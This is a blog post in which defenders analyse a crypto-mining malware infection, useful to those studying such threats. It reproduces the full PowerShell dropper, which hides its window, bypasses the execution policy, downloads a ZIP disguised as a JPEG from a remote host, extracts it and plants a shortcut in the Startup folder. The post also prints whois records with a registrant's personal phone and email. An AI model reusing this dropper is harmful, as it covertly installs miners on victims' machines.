Rise of the Crypto Miner Malware

We’ve been sitting on this for some time. But as we were tiding our notes we stumbled across this draft post we never really finished. Sadly, there is not too much to tell. But hopefully this will help other blueteamers, in understanding crypto-mining malware infections?

A copy of the powershell malware can be found on pastebin here:

https://pastebin.com/pxKXKKAY

The investigation started as a bit of powershell:

new ActiveXObject(“WScript.Shell”).Run(“powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command “+String.fromCharCode(34)+”$str0 =”http://gul";$str1 = ‘Miner’ ;$TempDir = [System.IO.Path]::GetTempPath();$startup = [environment]::getfolderpath(‘Startup’);$url1 = ($str0)+’fup.co/i/00676/e2zlk0e4qr4c.jpg’;$output1 = ($TempDir+$str1);$wc = New-Object System.Net.WebClient;$wc.DownloadFile($url1, $output1);Start-Sleep -s 30;$proj_files = Get-Item -Path ($TempDir+$str1);ForEach ($file in $proj_files) {;$filenew1 = $str1 + ‘.zip’;Rename-Item $file $filenew1};Expand-Archive -Path ($TempDir+$filenew1) -DestinationPath ($TempDir) -Force;Start-Sleep -s 20;$str3 = ‘update.lnk’;Copy-Item ($TempDir+$str3) -Destination $startup ;Start-Sleep -s 10;Invoke-Item ($startup+$str3)”+String.fromCharCode(34),0,false);
minergate-cli -user djamel4art@gmail.com -bcn 1

The payload: http://gulfup.co/i/00676/e2zlk0e4qr4c.jpg

Hexdump of the payload:

$ xxd e2zlk0e4qr4c.jpg 
0000000: 504b 0304 1400 0000 0800 665d 3945 22ec PK……..f]9E”.
0000010: 0e6f 40ed 5000 00f0 7a00 1100 0000 6d69 .o@.P…z…..mi
0000020: 6e65 7267 6174 652d 636c 692e 6578 65d4 nergate-cli.exe.
0000030: 3a0b 7414 5596 af3a 954e 8514 e942 ba23 :.t.U..:.N…B.#
0000040: 08ab 7104 7526 0c2e 4405 a7fd 2439 d36d ..q.u&..D…$9.m
0000050: 401b 3ab4 743b cb49 0203 3a31 e320 86ae @.:.t;.I..:1. ..

Looks like a ZIP file containing a bitcoin miner! Because the file’s magic bytes are 0x504b = PK.

We can use binwalk to extract parts of the binary:

$ binwalk e2zlk0e4qr4c.jpg
DECIMAL HEX DESCRIPTION
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
0 0x0 Zip archive data, at least v2.0 to extract
5303663 0x50ED6F Zip archive data, at least v2.0 to extract
5461951 0x5357BF Zip archive data, at least v2.0 to extract
5935809 0x5A92C1 Zip archive data, at least v2.0 to extract
7763954 0x7677F2 COBALT boot rom data (Flat boot rom or file system)
8031674 0x7A8DBA Zip archive data, at least v2.0 to extract
...abbreviated...

List of extracted files:

$ ls
0.zip 806577.zip 8A5FFA.zip e2zlk0e4qr4c.jpg rn.js
50ED6F.zip 8065D3.zip 8BD983.zip libeay32.dll ssleay32.dll
5357BF.zip 8265F6.zip Qt5Core.dll minergate-cli.exe update.lnk
5A92C1.zip 8268D8.zip Qt5Network.dll msvcp110.dll vccorlib110.dll
7A8DBA.zip 83D42C.zip Qt5WebSockets.dll msvcr110.dll
7FC82D.zip 83D454.zip cudart32_60.dll platforms

Standard strings against the windows shortcut (update.lnk)

$ strings update.lnk 
/C:\
Users
kamel
AppData
Local
Temp
Ka=.
1SPS
rn.js
C:\Users\kamel\AppData\Local\Temp\rn.js
desktop-4tlqnc3
%temp%\rn.js
Minergate

The command

minergate-cli -user djamel4art@gmail.com -bcn 1

Minergate-client comand breakdown

minergate-cli -user <account/email> -<coin type> <cores>

Therefore:

• account = djamel4art@gmail.com
• coin = Bytecoin
• cores = 1 A list of currency /coin types are:
• bcn Bytecoin
• xmr Monero
• fcn Fantomcoin
• dsh Dashcoin
• qcn QuazarCoin
• xdn DigitalNote
• mcn MonetaVerde
• aeon Aeon coin
• inf8 Infinium-8

  Whois

$ whois gulfup.co
Domain Name: gulfup.co
Registry Domain ID: D177495327-CO
Registrar WHOIS Server:
Registrar URL: whois.godaddy.com
Updated Date: 2017–03–11T11:29:25Z
Creation Date: 2017–03–11T11:12:08Z
Registry Expiry Date: 2018–03–10T23:59:59Z
Registrar: GoDaddy.com, Inc.
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: C177495323-CO
Registrant Name: Abdulaali Alzahrani
Registrant Organization:
Registrant Street: albaha
Registrant Street: albaha
Registrant Street:
Registrant City: albaha
Registrant State/Province: king abdulaziz
Registrant Postal Code: 61008
Registrant Country: SA
Registrant Phone: +966.564401880
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: zx_xs@hotmail.com
Registry Admin ID: C177495325-CO
Tech Name: Abdulaali Alzahrani
Tech Organization:
Tech Street: albaha
Tech Street: albaha
Tech Street:
Tech City: albaha
Tech State/Province: king abdulaziz
Tech Postal Code: 61008
Tech Country: SA
Tech Phone: +966.564401880
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: zx_xs@hotmail.com
Name Server: aragorn.ns.cloudflare.com
Name Server: melissa.ns.cloudflare.com

whois on the hosting IP range:

$ whois 62.210.139.211
inetnum: 62.210.128.0–62.210.255.255
org: ORG-ONLI1-RIPE
netname: IE-POOL-BUSINESS-HOSTING
descr: IP Pool for Iliad-Entreprises Business Hosting Customers
country: FR
admin-c: IENT-RIPE
tech-c: IENT-RIPE
status: LIR-PARTITIONED PA
mnt-by: MNT-TISCALIFR-B2B
created: 2012–11–02T11:40:24Z
last-modified: 2016–02–22T16:26:23Z
source: RIPE
mnt-routes: MNT-TISCALIFR-B2B
mnt-lower: MNT-TISCALIFR-B2B
For more information about Minergate visit: https://minergate.com/

Conclusion

Fake whois record for the domain, the created update.lnk file leaked a user name ‘kamal’, the minergate account was for a gmail account ‘djamel4art’. As this point we could not progress any further.

---

Share on: